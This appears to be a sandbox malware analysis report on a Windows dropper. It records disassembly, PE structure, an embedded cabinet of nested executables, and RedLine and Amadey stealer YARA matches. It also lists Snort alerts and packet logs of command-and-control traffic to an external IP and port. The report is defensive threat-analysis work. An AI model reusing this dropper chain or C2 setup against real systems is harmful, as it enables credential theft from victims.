                                                                                                                                                                                                      inc esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007FEAA91415ECh
                                                                                                                                                                                                      push 0000001Fh
                                                                                                                                                                                                      call 00007FEAA9141B0Bh
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      jmp 00007FEAA914161Ch
                                                                                                                                                                                                      cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                      jne 00007FEAA914160Eh
                                                                                                                                                                                                      mov dword ptr [004088B0h], esi
                                                                                                                                                                                                      push 004010C4h
                                                                                                                                                                                                      push 004010B8h
                                                                                                                                                                                                      call 00007FEAA9141736h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                      je 00007FEAA91415F9h
                                                                                                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                      mov eax, 000000FFh
                                                                                                                                                                                                      jmp 00007FEAA9141719h
                                                                                                                                                                                                      mov dword ptr [004081E4h], esi
                                                                                                                                                                                                      cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                      jne 00007FEAA91415FDh
                                                                                                                                                                                                      push 004010B4h
                                                                                                                                                                                                      push 004010ACh
                                                                                                                                                                                                      call 00007FEAA9141CC5h
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      pop ecx
                                                                                                                                                                                                      mov dword ptr [000088B0h], 00000000h

                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xb68ec.rsrc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc30000x888.reloc
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                      Sections

                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .rsrc0xc0000xb70000xb6a00False0.95906191178987data7.930785235213812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                      .reloc0xc30000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                      Resources

                                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                      AVI0xc9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                      RT_ICON0xf8140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                      RT_ICON0xfe7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x101640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x1034c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x104740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x1131c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x11bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x1228c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x127f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                      RT_ICON0x201c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x227700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x238180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                      RT_ICON0x241a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x246080x2f2dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x248fc0x1b0dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24aac0x166dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24c140x1c0dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24dd40x130dataEnglishUnited States
                                                                                                                                                                                                      RT_DIALOG0x24f040x120dataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x250240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                      RT_STRING0x250b00x520dataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x255d00x5ccdataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x25b9c0x4b0dataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x2604c0x44adataEnglishUnited States
                                                                                                                                                                                                      RT_STRING0x264980x3cedataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x268680x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0x268700x9b354Microsoft Cabinet archive data, many, 635732 bytes, 2 files, at 0x2c +A "v7020033.exe" +A "d4851931.exe", ID 1672, number 1, 24 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1bc40x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1bc80x24dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1bec0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1bf40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1bfc0x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c000xdASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c100x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c140xdASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c240x4dataEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c280x9ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c340x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_RCDATA0xc1c3c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                      RT_GROUP_ICON0xc1c440xbcdataEnglishUnited States
                                                                                                                                                                                                      RT_VERSION0xc1d000x408dataEnglishUnited States
                                                                                                                                                                                                      RT_MANIFEST0xc21080x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                                                      Imports

                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                      KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                      GDI32.dllGetDeviceCaps
                                                                                                                                                                                                      USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                      msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                      COMCTL32.dll
                                                                                                                                                                                                      Cabinet.dll
                                                                                                                                                                                                      VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      192.168.2.383.97.73.12249697190622043231 05/26/23-11:40:50.159297TCP2043231ET TROJAN Redline Stealer TCP CnC Activity4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      192.168.2.383.97.73.12249697190622043233 05/26/23-11:40:32.455619TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      83.97.73.122192.168.2.319062496972043234 05/26/23-11:40:36.975680TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response190624969783.97.73.122192.168.2.3

                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      May 26, 2023 11:40:31.586014032 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:31.643364906 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:31.645324945 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:32.455619097 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:32.512979031 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:32.562242985 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:36.918205976 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:36.975680113 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:37.062699080 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:43.996256113 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:44.056159019 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:44.056250095 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:44.056337118 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:44.056369066 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:44.110127926 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:45.734921932 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:45.838387966 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:45.844085932 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:45.891550064 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:45.927423954 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:45.985167980 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.022172928 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.079714060 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.082263947 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.139978886 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.188452959 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.343362093 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.400934935 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.432321072 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.489912987 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.511499882 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.569073915 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.610366106 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.665498018 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.723166943 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.731164932 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.788501978 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.790275097 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.847825050 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.880130053 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:46.937726021 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:46.985423088 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.030561924 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.087986946 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.088042021 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.141644955 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.356575966 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.413834095 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414064884 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414083004 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.414403915 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.469794989 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.487380028 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:47.545372009 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:47.594831944 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.101281881 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.158529997 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.158723116 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.159296989 CEST4969719062192.168.2.383.97.73.122
                                                                                                                                                                                                      May 26, 2023 11:40:50.216737986 CEST190624969783.97.73.122192.168.2.3
                                                                                                                                                                                                      May 26, 2023 11:40:50.262445927 CEST4969719062192.168.2.383.97.73.122

                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:11:40:16
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\qu0t4ukLoN.exe
                                                                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                                                                      File size:782336 bytes
                                                                                                                                                                                                      MD5 hash:1DF346C349B9B71B11825690BE73E635
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:11:40:17
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe
                                                                                                                                                                                                      Imagebase:0x210000
                                                                                                                                                                                                      File size:457216 bytes
                                                                                                                                                                                                      MD5 hash:A9A0FDF699EB764206C59FF3CA3FAC53
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:11:40:17
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe
                                                                                                                                                                                                      Imagebase:0xbc0000
                                                                                                                                                                                                      File size:281600 bytes
                                                                                                                                                                                                      MD5 hash:4D67FD4D3D62A45215D1FBDF9CA87397
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:11:40:18
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:186366 bytes
                                                                                                                                                                                                      MD5 hash:1BE37E0816A88025F557178CA7FC03C8
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:11:40:18
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff745070000
                                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                      Start time:11:40:19
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                                                                                                                                                                                                      Imagebase:0xe0000
                                                                                                                                                                                                      File size:98912 bytes
                                                                                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:11:40:19
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe
                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                      File size:148489 bytes
                                                                                                                                                                                                      MD5 hash:927C5B1DEF98D855184A0ED56D8A2787
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, Author: ditekSHen
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 78%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:11:40:26
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                      Start time:11:40:35
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                      Start time:11:40:43
                                                                                                                                                                                                      Start date:26/05/2023
                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      Imagebase:0x7ff658210000
                                                                                                                                                                                                      File size:69632 bytes
                                                                                                                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
